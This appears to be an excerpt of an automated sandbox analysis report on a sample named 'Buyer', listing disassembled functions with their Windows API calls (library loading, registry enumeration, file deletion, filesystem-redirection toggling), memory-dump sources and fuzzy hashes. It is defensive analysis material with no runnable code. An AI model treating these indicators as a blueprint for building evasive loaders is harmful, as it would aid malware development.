                                                                                                    Function 00FA7897 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FA78FF
                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FA7935
                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FA7946
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FA79C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                    • String ID: DllGetClassObject
                                                                                                    • API String ID: 753597075-1075368562
                                                                                                    • Opcode ID: 73895331766525357ce90b69fa37204800864021c97d48ffd4563bfeebb552c8
                                                                                                    • Instruction ID: 65c71d4ee871c7623d9f005fa694eb7737161843eadea826558741bbe41b0fb6
                                                                                                    • Opcode Fuzzy Hash: 73895331766525357ce90b69fa37204800864021c97d48ffd4563bfeebb552c8
                                                                                                    • Instruction Fuzzy Hash: 934160B2604304EFDF05EF54CC84E9B7BB9EF49314F1481AAA9059F246D7B4D940EBA0
                                                                                                    Function 00FD453A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FD45F3
                                                                                                    • IsMenu.USER32(?), ref: 00FD4608
                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FD4650
                                                                                                    • DrawMenuBar.USER32 ref: 00FD4663
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                    • Opcode ID: e11400621b24c8c711bf6187b6417bdc4291470fe07c86cde0ace50953d65bda
                                                                                                    • Instruction ID: dd52c19a6651fdead45fb3491c7a20ea107ed43efec6480b02b23a5d2a288c5b
                                                                                                    • Opcode Fuzzy Hash: e11400621b24c8c711bf6187b6417bdc4291470fe07c86cde0ace50953d65bda
                                                                                                    • Instruction Fuzzy Hash: 2D415D75A01249EFDB10CF64E884EAABBB6FF45364F08415AE91697351C734ED40EF50
                                                                                                    Function 00FA24C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FA4392: GetClassNameW.USER32(?,?,000000FF), ref: 00FA43B5
                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FA2548
                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FA255B
                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FA258B
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$_wcslen$ClassName
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 2081771294-1403004172
                                                                                                    • Opcode ID: 46d53aa66d838bbfca8d398115beca4bb17dc4acb73ec5a9e6bdf618ead0f21b
                                                                                                    • Instruction ID: dffc7a3967d1ad2883299ad44c99e71c2b3d01e07a903122ed4ff35d7f5a5903
                                                                                                    • Opcode Fuzzy Hash: 46d53aa66d838bbfca8d398115beca4bb17dc4acb73ec5a9e6bdf618ead0f21b
                                                                                                    • Instruction Fuzzy Hash: 2921E7B2E40104BEDB05AB64CC9ADFFBBA9DF46360F144519F821972E1DB3C594AB610
                                                                                                    Function 00FD36D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FD374B
                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00FD3752
                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FD3767
                                                                                                    • DestroyWindow.USER32(?), ref: 00FD376F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                    • String ID: SysAnimate32
                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                    • Opcode ID: 9a515fd5972fcea703de9da36bdd0257891ae41c345fc2c18dcc6976c91d30a5
                                                                                                    • Instruction ID: 68fe1d01585f7333e10abc3d890fd3d274d53284e22c7b3fdd6b420caf9e1e08
                                                                                                    • Opcode Fuzzy Hash: 9a515fd5972fcea703de9da36bdd0257891ae41c345fc2c18dcc6976c91d30a5
                                                                                                    • Instruction Fuzzy Hash: 7D21AEF1A04609BBEB104FB4DC84EBB37AEEB44378F18461AFA5096290D371ED41A761
                                                                                                    Function 00F650BD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F6506E,?,?,00F6500E,?,010098A8,0000000C,00F65165,?,00000002), ref: 00F650DD
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F650F0
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00F6506E,?,?,00F6500E,?,010098A8,0000000C,00F65165,?,00000002,00000000), ref: 00F65113
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 12c2c04466dbbb62228c04dadea73c6aed2492ddee7e4fa7621f56c9510917ab
                                                                                                    • Instruction ID: 0ac3728bdea9b98163b099179b92c71e971e884484fb40ca97870085d0946edd
                                                                                                    • Opcode Fuzzy Hash: 12c2c04466dbbb62228c04dadea73c6aed2492ddee7e4fa7621f56c9510917ab
                                                                                                    • Instruction Fuzzy Hash: DEF06234A0120CBBDB119FA5DC49BADBFB9EF44B66F000165F809A2150DF359D41EB91
                                                                                                    Function 00F454A3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F454F0,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F454AF
                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F454C1
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00F454F0,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F454D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                    • API String ID: 145871493-3689287502
                                                                                                    • Opcode ID: b0cacdc22f2d08933d255d0f759b81d483a09384f222b2b2a18b6a6711d9d88d
                                                                                                    • Instruction ID: af408e419594e94127df1143869a03bbc27cdee0d81a76e16727b508e50f63b8
                                                                                                    • Opcode Fuzzy Hash: b0cacdc22f2d08933d255d0f759b81d483a09384f222b2b2a18b6a6711d9d88d
                                                                                                    • Instruction Fuzzy Hash: 8EE0CD35E03A2257A21327356C1875E7B1ADFC1F377054017FE05D6250DB50CD41A0E1
                                                                                                    Function 00F4546C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F8466F,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F45475
                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F45487
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00F8466F,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F4549A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                    • API String ID: 145871493-1355242751
                                                                                                    • Opcode ID: 89b68fadc99c112aa4e0ee877492af67f553b07a81a06914667c1a822cca31b5
                                                                                                    • Instruction ID: 873751e23aab60c89cdb25325ca4c65e0e76b635d2b9ed22e1c180ae7256b6d4
                                                                                                    • Opcode Fuzzy Hash: 89b68fadc99c112aa4e0ee877492af67f553b07a81a06914667c1a822cca31b5
                                                                                                    • Instruction Fuzzy Hash: D2D01231903A226B66226735BC18A8A7F16DF81F3A3594127BD04EA165DF21CD41A594
                                                                                                    Function 00FB3030 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FB32EE
                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00FB3370
                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FB3386
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FB3397
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FB33A9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Delete$Copy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3226157194-0
                                                                                                    • Opcode ID: 02d7217e5a7fd7acd062049807a165f04845da8183c5de456762d9e3d3cc6d89
                                                                                                    • Instruction ID: ab9c26ee65c6bda3e8725af91f7025eb3dfd967a8186ce51f3b12667650bf54d
                                                                                                    • Opcode Fuzzy Hash: 02d7217e5a7fd7acd062049807a165f04845da8183c5de456762d9e3d3cc6d89
                                                                                                    • Instruction Fuzzy Hash: 93B14C72E00119ABDF11EBA5CC85EDFBBBDEF49310F1040A6F509E6145EA349B44AF61
                                                                                                    Function 00FCAB0E Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00FCABAE
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FCABBC
                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FCABEF
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FCADC4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3488606520-0
                                                                                                    • Opcode ID: 8ebaccfdac326820535521cc4f488eb209b7f8597d82a539490620eb5c7c3502
                                                                                                    • Instruction ID: b4824567a3cec1c1a5e735c4fb5d710422d5f3cf00356b9d6e5704cd7b9a1249
                                                                                                    • Opcode Fuzzy Hash: 8ebaccfdac326820535521cc4f488eb209b7f8597d82a539490620eb5c7c3502
                                                                                                    • Instruction Fuzzy Hash: BDA1A271614301AFD720DF28C882F2AB7E5AF84718F14885DF95A9B292DB74ED419B82
                                                                                                    Function 00FCC150 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FCD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCBE35,?,?), ref: 00FCD13C
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD178
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD1E6
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD21C
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCC22C
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FCC287
                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00FCC2EA
                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00FCC32D
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FCC33A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                    • String ID:
                                                                                                    • API String ID: 826366716-0
                                                                                                    • Opcode ID: a002e4bb6a39b07f602bb3b6542c839bde723494b9ff427ff213ecf2919672eb
                                                                                                    • Instruction ID: 1ff18c694044d03e5ec552c4effbc527a425f857c778891cd1ff303e6d589337
                                                                                                    • Opcode Fuzzy Hash: a002e4bb6a39b07f602bb3b6542c839bde723494b9ff427ff213ecf2919672eb
                                                                                                    • Instruction Fuzzy Hash: 7461D131608242AFC714DF64C981F6ABBE5FF84318F04855DF4998B292CB35ED46EB92
                                                                                                    Function 00FAEA3C Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FAE421: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FAD507,?), ref: 00FAE43E
                                                                                                      • Part of subcall function 00FAE421: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FAD507,?), ref: 00FAE457
                                                                                                      • Part of subcall function 00FAE7DA: GetFileAttributesW.KERNEL32(?,00FAD57A), ref: 00FAE7DB
                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00FAEAB4
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00FAEAED
                                                                                                    • _wcslen.LIBCMT ref: 00FAEC2C
                                                                                                    • _wcslen.LIBCMT ref: 00FAEC44
                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00FAEC91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3183298772-0
                                                                                                    • Opcode ID: 597e9e36c3b2d44744a286a07cb880c8ba91f23bb8d6c4b040dae5694ea011a2
                                                                                                    • Instruction ID: 43b3550565a488443aac08c7388c905ce709a9a437b90fb12bcb848cf39a4bdc
                                                                                                    • Opcode Fuzzy Hash: 597e9e36c3b2d44744a286a07cb880c8ba91f23bb8d6c4b040dae5694ea011a2
                                                                                                    • Instruction Fuzzy Hash: 415184F24083859BC724EB60CC859DB77ECAF85310F00492EF685D3191EF78A688DB66
                                                                                                    Function 00FA92A9 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FA92C6
                                                                                                    • VariantClear.OLEAUT32 ref: 00FA9337
                                                                                                    • VariantClear.OLEAUT32 ref: 00FA9396
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FA9409
                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FA9434
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                    • String ID:
                                                                                                    • API String ID: 4136290138-0
                                                                                                    • Opcode ID: 8b8ab95935044d187d69adc3ea3027535920246d309e8f15b204aacac71e5aae
                                                                                                    • Instruction ID: 24b0d8b6db228b932931634c4940adf13f51216e71571ef539a708489de8d111
                                                                                                    • Opcode Fuzzy Hash: 8b8ab95935044d187d69adc3ea3027535920246d309e8f15b204aacac71e5aae
                                                                                                    • Instruction Fuzzy Hash: 48516BB5A00219EFCB10CF68C884AAAB7F9FF8D314B158169E909DB350D774E911CB90
                                                                                                    Function 00FB926A Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FB931D
                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00FB9349
                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FB93A1
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FB93C6
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FB93CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                    • String ID:
                                                                                                    • API String ID: 2832842796-0
                                                                                                    • Opcode ID: 560daba224e0e269b7515f261c9b9c3e072ef829fa4c33952933a78fd4aa0fe7
                                                                                                    • Instruction ID: 8f611c48c7094b67aa2dc566f66ce6233bd0ef6a2b5f5b725ec68cda7e5ae25b
                                                                                                    • Opcode Fuzzy Hash: 560daba224e0e269b7515f261c9b9c3e072ef829fa4c33952933a78fd4aa0fe7
                                                                                                    • Instruction Fuzzy Hash: FF513035A002199FCB05DF55C881AAEBBF6FF49314F088059E9496B362CB75ED41DF90
                                                                                                    Function 00FC966B Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00FC96C7
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00FC9757
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FC9773
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00FC97B9
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00FC97D9
                                                                                                      • Part of subcall function 00F5FAC6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00FB172C,?,7529E610), ref: 00F5FAE3
